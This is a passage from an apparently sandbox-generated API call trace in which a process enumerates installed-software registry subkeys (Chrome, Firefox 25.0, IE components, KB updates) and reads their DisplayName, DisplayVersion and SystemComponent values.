lpftLastWriteTime=0x0 | out: lpName="DirectDrawEx", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.171] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="DirectDrawEx", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.171] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.171] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.171] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="DirectDrawEx", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.171] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.171] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.171] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="DirectDrawEx", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.171] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.171] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.171] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x4, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Fontcore", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.171] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Fontcore", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.171] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.171] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.171] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Fontcore", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.171] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.171] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.171] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Fontcore", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.171] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.171] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.171] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x5, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Google Chrome", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.171] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Google Chrome", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.172] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.172] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.172] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Google Chrome", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.172] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.172] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.172] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Google Chrome", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.172] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x47, lpcbData=0xe21700*=0xe) returned 0x0 [0030.172] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.172] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Google Chrome", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.172] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x35, lpcbData=0xe21700*=0xe) returned 0x0 [0030.172] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.172] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x6, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE40", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.172] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="IE40", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.172] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.172] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.172] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="IE40", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.172] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.172] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.172] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="IE40", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.172] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.172] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.172] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x7, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE4Data", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.172] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="IE4Data", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.172] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.173] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.173] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="IE4Data", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.173] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.173] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.173] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="IE4Data", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.173] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.173] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.173] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x8, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE5BAKEX", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.173] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="IE5BAKEX", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.173] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.173] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.173] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="IE5BAKEX", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.173] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.173] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.173] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="IE5BAKEX", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.173] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.173] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.173] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x9, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IEData", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.173] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="IEData", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.173] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.173] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.173] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="IEData", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.173] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.173] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.173] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="IEData", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.173] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.173] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.173] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0xa, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MobileOptionPack", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.174] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="MobileOptionPack", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.174] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.174] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.174] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="MobileOptionPack", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.174] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.174] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.174] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="MobileOptionPack", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.174] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.174] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.174] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0xb, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla Firefox 25.0 (x86 en-US)", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.174] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Mozilla Firefox 25.0 (x86 en-US)", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.174] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.174] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.174] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Mozilla Firefox 25.0 (x86 en-US)", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.174] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.174] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.174] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Mozilla Firefox 25.0 (x86 en-US)", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.174] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x4d, lpcbData=0xe21700*=0x21) returned 0x0 [0030.174] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.174] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Mozilla Firefox 25.0 (x86 en-US)", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.174] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x32, lpcbData=0xe21700*=0x5) returned 0x0 [0030.174] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.174] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0xc, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MozillaMaintenanceService", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.174] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="MozillaMaintenanceService", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.175] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.175] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.175] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="MozillaMaintenanceService", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.175] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.175] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.175] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="MozillaMaintenanceService", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.175] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x4d, lpcbData=0xe21700*=0x1c) returned 0x0 [0030.175] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.175] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="MozillaMaintenanceService", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.175] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x32, lpcbData=0xe21700*=0x5) returned 0x0 [0030.175] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.175] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0xd, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SchedulingAgent", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.175] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="SchedulingAgent", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.175] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.175] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.175] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="SchedulingAgent", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.175] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.175] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.175] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="SchedulingAgent", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.175] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.175] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.176] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0xe, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WIC", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.176] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="WIC", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.179] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.179] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.179] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="WIC", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.180] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.180] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.180] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="WIC", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.180] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.180] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.180] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0xf, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.180] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.180] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.180] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.180] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.180] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x1, lpcbData=0xe21700*=0x4) returned 0x0 [0030.180] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.180] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x10, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.180] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.180] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.180] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.180] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.180] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.180] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.180] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.180] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.180] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.180] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x11, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.180] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.180] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.180] RegCloseKey (hKey=0x1a8) returned 